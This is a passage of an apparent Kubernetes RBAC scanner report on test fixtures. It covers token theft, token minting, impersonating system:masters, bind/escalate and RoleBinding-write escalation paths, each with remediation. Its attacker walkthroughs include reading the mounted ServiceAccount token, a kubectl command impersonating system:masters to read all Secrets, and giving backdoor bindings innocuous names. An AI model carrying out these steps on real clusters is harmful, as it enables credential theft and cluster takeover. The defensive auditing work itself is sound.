  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:vulnerable:privileged-reader (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH

Subjects can reach token_mint in 1 hop(s)

KUBE-PRIVESC-PATH-GENERIC 3 subjects Score 7.0–6.5
MITRE ATT&CK: T1078.004T1098T1068

Affected subjects (3)

HIGH ServiceAccount/rbac-fixtures/sa-token-create Cluster 7.0
ServiceAccount/rbac-fixtures/sa-token-create can reach token_mint in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-createtoken_mint
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a multi-hop chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/rbac-fixtures/sa-token-create/ via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  3. Final step: attacker reaches token_mint.
  1. Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the permission create serviceaccounts/token (cluster-wide) that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create/).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the permission create serviceaccounts/token (cluster-wide) that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create/).
  3. Re-run the scanner to confirm the path no longer resolves.
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 6.5
ServiceAccount/rbac-fixtures/sa-pod-create can reach token_mint in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-createtoken_mint
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a multi-hop chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-token-create via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
2. ServiceAccount/rbac-fixtures/sa-token-create/ via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-token-create ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  4. Final step: attacker reaches token_mint.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
  2. Step 2 of 2 Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-token-create).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-token-create).
  3. Re-run the scanner to confirm the path no longer resolves.
HIGH ServiceAccount/vulnerable/privileged-reader Cluster 6.5
ServiceAccount/vulnerable/privileged-reader can reach token_mint in 2 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/privileged-readertoken_mint
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a multi-hop chain to token_mint. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.

The chain:
1. ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-token-create via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
2. ServiceAccount/rbac-fixtures/sa-token-create/ via mint_arbitrary_token (create serviceaccounts/token (cluster-wide)): can mint a service-account token for any ServiceAccount in any namespace

Impact Compromise of ServiceAccount/vulnerable/privileged-reader chains to token_mint. Investigate the specific privileges this sink represents in your cluster.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-token-create ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls serviceaccounts/token at cluster scope (create serviceaccounts/token (cluster-wide)) to mint a token for any ServiceAccount in any namespace. With no resourceNames constraint, the verb amounts to a credential-issuing oracle.
  4. Final step: attacker reaches token_mint.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-token-create
  2. Step 2 of 2 Mint a token for any ServiceAccount mint_arbitrary_token

    The create verb on serviceaccounts/token at cluster scope (without resourceNames) lets the holder mint a fresh, valid token for any ServiceAccount in any namespace. No pod creation or exec needed, and it leaves a thinner audit trail than the pod-mount route.

    From ServiceAccount/rbac-fixtures/sa-token-create
    Permission granted create serviceaccounts/token (cluster-wide)
    Gives the attacker can mint a service-account token for any ServiceAccount in any namespace
Remediation
Break the chain at the weakest hop: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-token-create).
  1. Confirm each hop with kubectl auth can-i.
  2. Apply the cut: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-token-create).
  3. Re-run the scanner to confirm the path no longer resolves.

RBAC

14 findings · 10 rules · 8 critical · 6 high · 0 medium · 0 low
CRITICAL

Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate

KUBE-PRIVESC-008 1 subject Score 10.0
MITRE ATT&CK: T1078T1078.004T1550T1134

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 10.0
Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate Resource: RBACRule/cr-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate has the impersonate verb on users/groups/serviceaccounts via ClusterRoleBinding crb-impersonate → ClusterRole cr-impersonate. Cluster-wide: applies to every current and future namespace.

Kubernetes' impersonation lets a request set Impersonate-User/Impersonate-Group headers (or kubectl --as) so the API server processes the request as a different identity. The Kubernetes project flags this in RBAC Good Practices as one of three verbs (alongside bind and escalate) that override normal RBAC limits.

Most damaging is the ability to impersonate the system:masters group, which is hardcoded inside kube-apiserver to bypass RBAC entirely. There is no Role or RoleBinding that grants system:masters membership; the apiserver simply trusts the assertion. kubectl --as=admin --as-group=system:masters get secrets -A runs as cluster-admin, full stop. Impersonation is also stealthier than a binding change because audit logs show user.username as the original subject.

Impact Act as any user/group/ServiceAccount in Cluster-wide; impersonating system:masters bypasses all RBAC checks irrevocably.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueRBAC impersonation

Kubernetes has a built-in "act as another user" feature: the impersonate verb on users, groups, or serviceaccounts. Anyone with that verb can submit requests as any identity, bypassing whatever permissions they don't have themselves.

Granting impersonate on groups = ["*"] is equivalent to cluster-admin: the holder can impersonate system:masters.

  1. Attacker confirms the verb with kubectl auth can-i impersonate users --as=sa-impersonate -A.
  2. They run kubectl --as=admin --as-group=system:masters get clusterrolebindings to confirm system:masters impersonation succeeds.
  3. They impersonate the highest-privileged ServiceAccount they can find (e.g. system:serviceaccount:kube-system:clusterrole-aggregation-controller) and exfiltrate Secrets cluster-wide.
  4. They establish persistence by creating a benign-looking ClusterRoleBinding via the impersonated identity (audit logs blame the impersonated SA, not the attacker).
  5. They optionally add their own user to a privileged group via OIDC group claims, providing identity-layer persistence that survives RBAC remediation.
Remediation
Remove impersonate entirely; if a SaaS console truly needs it, gate on resourceNames and never grant it on groups.
  1. Remove impersonate on users, groups, and serviceaccounts. The vast majority of workloads have no need for impersonation.
  2. If impersonation is genuinely required, scope to users only (not groups, and never allow system:masters), use resourceNames to allow only specific identities, and never grant cluster-wide.
  3. Enable Impersonate-* audit policy at Metadata level minimum so every impersonated request is logged with the original caller. SIEM-alert on impersonation of any system: user or group.
  4. Verify with kubectl auth can-i impersonate '*' --as=sa-impersonate -A returning no.
Evidence
ScopeCluster
API groupscore/v1
Resourcesgroups
Verbsimpersonate
impersonate: Act as any user, group, or ServiceAccount
Source rolecr-impersonate
Inspect: kubectl get clusterrole cr-impersonate -o yaml
Source bindingcrb-impersonate
Inspect: kubectl get clusterrolebinding crb-impersonate -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "groups"
  ],
  "scope": "cluster",
  "source_binding": "crb-impersonate",
  "source_role": "cr-impersonate",
  "verbs": [
    "impersonate"
  ]
}
CRITICAL

Cluster-wide bind/escalate on roles bypasses RBAC

KUBE-PRIVESC-009 1 subject Score 10.0
MITRE ATT&CK: T1098T1078.004T1548

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-bind-escalate Cluster 10.0
Cluster-wide bind/escalate on roles bypasses RBAC (ServiceAccount/rbac-fixtures/sa-bind-escalate)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-bind-escalate Resource: RBACRule/cr-bind-escalate

Subject ServiceAccount/rbac-fixtures/sa-bind-escalate has the bind or escalate verb on roles/clusterroles via ClusterRoleBinding crb-bind-escalate → ClusterRole cr-bind-escalate. Cluster-wide: applies to every current and future namespace.

Kubernetes' RBAC normally enforces a privilege-escalation guard: you cannot create a Role/RoleBinding granting permissions you do not already hold. The escalate and bind verbs are explicit, documented exceptions to that guard.

escalate lets the subject author or modify a Role/ClusterRole with verbs and resources they don't currently possess. In practice, they rewrite an existing Role they're already bound to and instantly inherit whatever they wrote into it.

bind lets the subject create a RoleBinding/ClusterRoleBinding referencing a (Cluster)Role they don't already hold. With bind on clusterroles, an attacker creates a ClusterRoleBinding from themselves to cluster-admin and is done in one step.

Impact Defeat the API-level escalation guard in Cluster-wide; subject can grant itself any (Cluster)Role's permissions, including cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueRBAC bind/escalate bypass

RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

  1. Attacker confirms the verb with kubectl auth can-i bind clusterroles --as=sa-bind-escalate -A.
  2. They write a one-line ClusterRoleBinding from their identity (or a SA they control) to the cluster-admin ClusterRole and kubectl apply it.
  3. They re-use the same token (ClusterRoleBindings take effect immediately on next request) and have full cluster control.
  4. Alternatively, with escalate on clusterroles, they kubectl edit clusterrole/<role-they-already-have> and add * verbs/resources/apiGroups, retaining the same binding.
  5. They optionally name the new ClusterRoleBinding innocuously (e.g. cluster-monitor-binding) so the change is less visible to operators reviewing kubectl get clusterrolebindings.
Remediation
Remove bind and escalate from non-admin identities; gate any legitimate need behind admission policy that rejects bindings to cluster-admin or system roles.
  1. Audit every Role/ClusterRole that includes bind or escalate with kubectl get clusterroles,roles -A -o json | jq '.items[] | select(.rules[]?.verbs[]? | IN("bind","escalate"))'.
  2. Remove the verbs from this Role/ClusterRole. If operators legitimately need them (Argo CD, Crossplane, OperatorHub), scope bind with resourceNames to a list of low-privilege ClusterRoles.
  3. Add a ValidatingAdmissionPolicy (or Kyverno) that rejects creation of any ClusterRoleBinding referencing cluster-admin/admin/system:masters outside a tiny admin allowlist.
  4. Verify with kubectl auth can-i bind clusterroles --as=sa-bind-escalate -A and kubectl auth can-i escalate roles --as=sa-bind-escalate -A both returning no.
Evidence
ScopeCluster
API groupsrbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resourcesrolesclusterroles
roles: Namespace-scoped RBAC rules
clusterroles: Cluster-scoped RBAC rules
Verbsbindescalate
bind: Bind any role to any subject
escalate: Grant rules beyond the caller's own permissions
Source rolecr-bind-escalate
Inspect: kubectl get clusterrole cr-bind-escalate -o yaml
Source bindingcrb-bind-escalate
Inspect: kubectl get clusterrolebinding crb-bind-escalate -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "",
  "resources": [
    "roles",
    "clusterroles"
  ],
  "scope": "cluster",
  "source_binding": "crb-bind-escalate",
  "source_role": "cr-bind-escalate",
  "verbs": [
    "bind",
    "escalate"
  ]
}
CRITICAL

Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path

KUBE-PRIVESC-010 2 subjects Score 10.0
MITRE ATT&CK: T1098T1078.004T1548

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Cluster 10.0
Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Resource: RBACRule/cr-rolebinding-mutate

Subject ServiceAccount/rbac-fixtures/sa-rolebinding-mutate can create/update/patch rolebindings/clusterrolebindings via ClusterRoleBinding crb-rolebinding-mutate → ClusterRole cr-rolebinding-mutate. Cluster-wide: applies to every current and future namespace.

RoleBinding write is the most direct self-grant path in Kubernetes. Even with the API-level escalation guard active (binding only to roles whose permissions you already have), this permission is dangerous: if the subject already holds any powerful permission (often inherited from a default ClusterRole like view/edit), they can re-bind it to backup identities for persistence.

A RoleBinding can also reference a *ClusterRole*, granting that ClusterRole's permissions inside the binding's namespace, so create rolebindings in kube-system is effectively cluster-admin-on-kube-system. Combined with bind on clusterroles (KUBE-PRIVESC-009), this bypasses the escalation guard entirely and yields cluster-admin in one step. Microsoft's Threat Matrix for Kubernetes documents this as the Cluster-admin binding technique.

Impact Self-grant any role the subject already holds (or any ClusterRole, when paired with bind or when binding into namespaces); cluster-wide writes are one step from cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueRoleBinding write access

create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

  1. Attacker enumerates what they can already bind with kubectl auth can-i create clusterrolebindings --as=sa-rolebinding-mutate -A and kubectl auth can-i --list --as=sa-rolebinding-mutate -A.
  2. If they hold a useful role, they create a ClusterRoleBinding granting that role to a backup identity for persistence.
  3. With bind on cluster-admin (often via wildcards), they create a ClusterRoleBinding from themselves to cluster-admin.
  4. Even without bind, in kube-system they create a RoleBinding referencing system:controller:clusterrole-aggregation-controller (which has escalate baked in) and pivot from there.
  5. They name the binding innocuously (e.g. monitoring-readonly) so audit logs look benign.
Remediation
Restrict create/update/patch on rolebindings/clusterrolebindings to a small admin boundary; require all RBAC changes to flow through GitOps with PR review.
  1. Audit who has write access to RBAC bindings. Most workloads should have zero RBAC write rights.
  2. Remove the verbs entirely from this Role/ClusterRole, or scope them with resourceNames to a fixed list of binding names that the workload owns.
  3. Move RBAC management to GitOps (Argo CD/Flux) so binding changes require a PR. The GitOps controller should be the only identity with cluster-wide RBAC write access.
  4. Add a ValidatingAdmissionPolicy that rejects ClusterRoleBindings to high-risk ClusterRoles (cluster-admin, admin, anything matching *system:*) outside an approved admin allowlist.
  5. Verify with kubectl auth can-i create clusterrolebindings --as=sa-rolebinding-mutate -A returning no.
Evidence
ScopeCluster
API groupsrbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resourcesrolebindingsclusterrolebindings
rolebindings: Namespace-scoped RBAC grants
clusterrolebindings: Cluster-scoped RBAC grants
Verbscreateupdatepatch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source rolecr-rolebinding-mutate
Inspect: kubectl get clusterrole cr-rolebinding-mutate -o yaml
Source bindingcrb-rolebinding-mutate
Inspect: kubectl get clusterrolebinding crb-rolebinding-mutate -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "",
  "resources": [
    "rolebindings",
    "clusterrolebindings"
  ],
  "scope": "cluster",
  "source_binding": "crb-rolebinding-mutate",
  "source_role": "cr-rolebinding-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}
CRITICAL ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Namespace 10.0
Namespace rbac-ns-fixtures only write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)
Scope · Namespace Namespace rbac-ns-fixtures only
Category: Privilege Escalation Subject: ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Resource: RBACRule/rbac-ns-fixtures/r-ns-rolebinding-mutate

Subject ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate can create/update/patch rolebindings/clusterrolebindings via RoleBinding rbac-ns-fixtures/rb-ns-rolebinding-mutate → Role rbac-ns-fixtures/r-ns-rolebinding-mutate. Namespace rbac-ns-fixtures only.

RoleBinding write is the most direct self-grant path in Kubernetes. Even with the API-level escalation guard active (binding only to roles whose permissions you already have), this permission is dangerous: if the subject already holds any powerful permission (often inherited from a default ClusterRole like view/edit), they can re-bind it to backup identities for persistence.

A RoleBinding can also reference a *ClusterRole*, granting that ClusterRole's permissions inside the binding's namespace, so create rolebindings in kube-system is effectively cluster-admin-on-kube-system. Combined with bind on clusterroles (KUBE-PRIVESC-009), this bypasses the escalation guard entirely and yields cluster-admin in one step. Microsoft's Threat Matrix for Kubernetes documents this as the Cluster-admin binding technique.

Impact Self-grant any role the subject already holds (or any ClusterRole, when paired with bind or when binding into namespaces); cluster-wide writes are one step from cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
TechniqueRoleBinding write access

create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

  1. Attacker enumerates what they can already bind with kubectl auth can-i create clusterrolebindings --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures and kubectl auth can-i --list --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures.
  2. If they hold a useful role, they create a ClusterRoleBinding granting that role to a backup identity for persistence.
  3. With bind on cluster-admin (often via wildcards), they create a ClusterRoleBinding from themselves to cluster-admin.
  4. Even without bind, in kube-system they create a RoleBinding referencing system:controller:clusterrole-aggregation-controller (which has escalate baked in) and pivot from there.
  5. They name the binding innocuously (e.g. monitoring-readonly) so audit logs look benign.
Remediation
Restrict create/update/patch on rolebindings/clusterrolebindings to a small admin boundary; require all RBAC changes to flow through GitOps with PR review.
  1. Audit who has write access to RBAC bindings. Most workloads should have zero RBAC write rights.
  2. Remove the verbs entirely from this Role/ClusterRole, or scope them with resourceNames to a fixed list of binding names that the workload owns.
  3. Move RBAC management to GitOps (Argo CD/Flux) so binding changes require a PR. The GitOps controller should be the only identity with cluster-wide RBAC write access.
  4. Add a ValidatingAdmissionPolicy that rejects ClusterRoleBindings to high-risk ClusterRoles (cluster-admin, admin, anything matching *system:*) outside an approved admin allowlist.
  5. Verify with kubectl auth can-i create clusterrolebindings --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures returning no.
Evidence
ScopeNamespace
Namespacerbac-ns-fixtures
API groupsrbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resourcesrolebindings
rolebindings: Namespace-scoped RBAC grants
Verbscreateupdatepatch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source roler-ns-rolebinding-mutate
Inspect: kubectl get role r-ns-rolebinding-mutate -n rbac-ns-fixtures -o yaml
Source bindingrb-ns-rolebinding-mutate
Inspect: kubectl get rolebinding rb-ns-rolebinding-mutate -n rbac-ns-fixtures -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "rbac-ns-fixtures",
  "resources": [
    "rolebindings"
  ],
  "scope": "namespace",
  "source_binding": "rb-ns-rolebinding-mutate",
  "source_role": "r-ns-rolebinding-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}
CRITICAL

get nodes/proxy enables kubelet exec via API server

KUBE-PRIVESC-012 1 subject Score 10.0
MITRE ATT&CK: T1609T1611T1078.004T1610

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-nodes-proxy Cluster 10.0
